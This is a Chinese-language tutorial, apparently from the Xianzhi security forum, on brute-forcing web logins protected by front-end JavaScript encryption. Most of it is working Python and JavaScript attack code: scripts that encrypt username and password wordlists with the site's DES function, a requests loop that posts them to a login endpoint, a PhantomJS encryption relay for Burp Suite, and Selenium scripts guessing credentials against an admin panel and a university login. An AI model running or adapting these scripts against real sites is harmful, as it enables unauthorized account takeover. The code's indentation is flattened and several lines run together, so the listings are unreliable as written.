0x00 执行加密的js文件生成加密内容
如 https://yyy.xxx.com/assets/des/des.js
对密码(123456)进行了前端加密传输。
这里还需要从页面源代码找到加密方法的参数
pip install PyExecJS
再安装PhantomJS(可选),或者用默认的js解析引擎也行。(execjs.get().name)
加密脚本:生成加密后的用户名和密码
#coding:utf-8#from selenium import webdriverimport execjsdef mzDes(s,para):
despara = execjs.get('phantomjs').compile(s).call("strEnc",para,"csc","mz","2017")
return desparawith open('des.js','r') as mzCrypto:
s = mzCrypto.read()
with open('users.txt','r') as users: #des username
with open('des_users.txt','w') as f4DesUser:
user = users.readlines()
for u in user:
uname = u.strip()
print uname
desUsername = mzDes(s,uname)
print desUsername
f4DesUser.write(desUsername+'\n')
with open('pwdTop54.txt','r') as pwds: #des password
with open('des_pwds.txt','w') as f4DesPwd:
pwd = pwds.readlines()
for p in pwd:
passwd = p.strip()
print passwd
desPassword = mzDes(s,passwd)
print desPassword
f4DesPwd.write(desPassword+'\n')
这样就可以利用burpsuite/python脚本加载加密后的字典愉快的爆破啦。
py脚本爆破(单线程):
#coding:utf-8#from selenium import webdriverimport execjsimport requestsimport resuccessCount = 0def mzDes(s,para):
despara = execjs.get().compile(s).call("strEnc",para,"csc","mz","2017")
return desparawith open('des.js','r') as mzCrypto:
s = mzCrypto.read()
with open('users.txt','r') as users: #des username
user = users.readlines()
for u in user:
with open('top50.txt','r') as pwds: #des password
uname = u.strip()
print uname
desUsername = mzDes(s,uname)
print desUsername
pwd = pwds.readlines()
for p in pwd:
passwd = p.strip()
print passwd
desPassword = mzDes(s,passwd)
print desPassword
burp0_url = "https://yyy.xxx.com:443/login"
burp0_cookies = {"acw_tc": "2", "session.id": "5e"}
burp0_headers = {"User-Agent": "Mozilla/5.0 Firefox", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://yyy.xxx.com", "Connection": "close", "Referer": "https://yyy.xxx.com/login", "Upgrade-Insecure-Requests": "1"}
burp0_data = {"usernumber": "test", "username": desUsername, "password": desPassword, "geetest_challenge": "caaf52fec"}
rsp = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
#print rsp.headers['content-length']
#if rsp.headers['content-length'] != 23862:
# print 'success!!!'
print len(rsp.content)
if len(rsp.content) != 23862:
print 'success'
successCount = successCount + 1
pattern = re.compile(r'<p class="login-error">(.*?)</p>')
bruteResult = pattern.search(rsp.text)
print bruteResultprint successCount
如果遇到结合了动态因子(cookie或请求参数的某动态值)加密的,如key = substr(0,8,xsession),就要根据实际情况写爆破脚本了。
0x01 burpsuite插件jsencrypt
安装phantomjs
https://github.com/c0ny1/jsEncrypter
用法参考readme
编写对应的jsEncrypter_des.js
var webserver = require('webserver');server = webserver.create();var host = '127.0.0.1';var port = '1664';// 加载实现加密算法的js脚本var wasSuccessful = phantom.injectJs('des.js');/*引入实现加密的js文件*/// 处理函数function js_encrypt(payload){
var newpayload;
/**********在这里编写调用加密函数进行加密的代码************/
//var b = new Base64();
newpayload = strEnc(payload,"key","para0","para1");
/**********************************************************/
return newpayload;}if(wasSuccessful){
console.log("[*] load js successful");
console.log("[!] ^_^");
console.log("[*] jsEncrypterJS start!");
console.log("[+] address: http://"+host+":"+port);}else{
console.log('[*] load js fail!');}var service = server.listen(host+':'+port,function(request, response){
try{
if(request.method == 'POST'){
var payload = request.post['payload'];
var encrypt_payload = js_encrypt(payload);
console.log('[+] ' + payload + ':' + encrypt_payload);
response.statusCode = 200;
response.write(encrypt_payload.toString());
response.close();
}else{
response.statusCode = 200;
response.write("^_^\n\rhello jsEncrypter!");
response.close();
}
}catch(e){
console.log('\n-----------------Error Info--------------------')
var fullMessage = "Message: "+e.toString() + ':'+ e.line;
for (var p in e) {
fullMessage += "\n" + p.toUpperCase() + ": " + e[p];
}
console.log(fullMessage);
console.log('---------------------------------------------')
console.log('[*] phantomJS exit!')
phantom.exit();
} });
0x02 理解js加密算法
如md5/sha1,直接写py脚本即可,复杂一点的就要调试js了
burpsuite的intruder模块自带了很多加密的选项可以直接用
0x03 浏览器自动化爆破
安装selenium
安装浏览器驱动,加入环境变量。
#coding:utf-8import timeimport sysfrom selenium import webdriverreload(sys) sys.setdefaultencoding('utf-8')def BruteLogin(user,pwd):
browser.get('http://xxx.cn/manage/login.aspx')
browser.implicitly_wait(7)
elem = browser.find_element_by_name("name")
elem.send_keys(user)
elem=browser.find_element_by_name("pws")
elem.send_keys(pwd)
elem=browser.find_element_by_id("submit")
#print browser.current_window_handle
elem.click()
time.sleep(1)
if '当前用户' in browser.page_source:
print 'Login Success:' + user + '|' + pwd
sys.exit()
else:
print 'LoginFaild!'browser = webdriver.Chrome()def main():
with open('usernameTop500.txt','r') as fuser:
for user in fuser.readlines():
u = user.strip()
with open('topwdglobal.txt','r') as fpwd:
for pwd in fpwd.readlines():
p = pwd.strip()
print 'testing...' + u,p
BruteLogin(u,p)
browser.quit()if __name__ == '__main__':
main()
如果有些元素不能直接定位,就尝试用autochain,如:
#coding:utf-8#Author:LSA#Descript:selenium for brute#Data:201812import timeimport sysfrom selenium import webdriverfrom selenium.webdriver.common import action_chains, keysimport timereload(sys) sys.setdefaultencoding('utf-8')def BruteLogin(user,pwd):
browser.get('http://xxx.edu.cn/login.jsp')
browser.implicitly_wait(20)
action = action_chains.ActionChains(browser)
elem = browser.find_element_by_name("j_username")
elem.send_keys(user)
action.perform()
elem=browser.find_element_by_name("j_password")
elem.send_keys(pwd)
action.perform()
elem=browser.find_element_by_name("btn_submit")
#print browser.current_window_handle
#elem.click()
action.send_keys("document.getElementsByName('btn_submit')[0].click()"+keys.Keys.ENTER)
action.perform()
time.sleep(1)
if '当前用户' in browser.page_source:
print 'Login Success:' + user + '|' + pwd
sys.exit()
else:
print 'LoginFaild!'browser = webdriver.Chrome()def main():
with open('usernameTop500.txt','r') as fuser:
for user in fuser.readlines():
u = user.strip()
with open('topwdglobal.txt','r') as fpwd:
for pwd in fpwd.readlines():
p = pwd.strip()
print 'testing...' + u,p
BruteLogin(u,p)
browser.quit()if __name__ == '__main__':
main()
0x04 misc
中间服务器:自己搭一个服务及作为中继进行加密再发给目标服务器,较麻烦。
断点调试js修改参数
fiddler替换js
可视具体情况使用。
//预览看到代码缩进没了,全部py脚本打包到附件了
https://xzfile.aliyuncs.com/upload/affix/20200206161837-4690f6bc-48b9-1.zip
来自先知社区:https://xz.aliyun.com/t/7190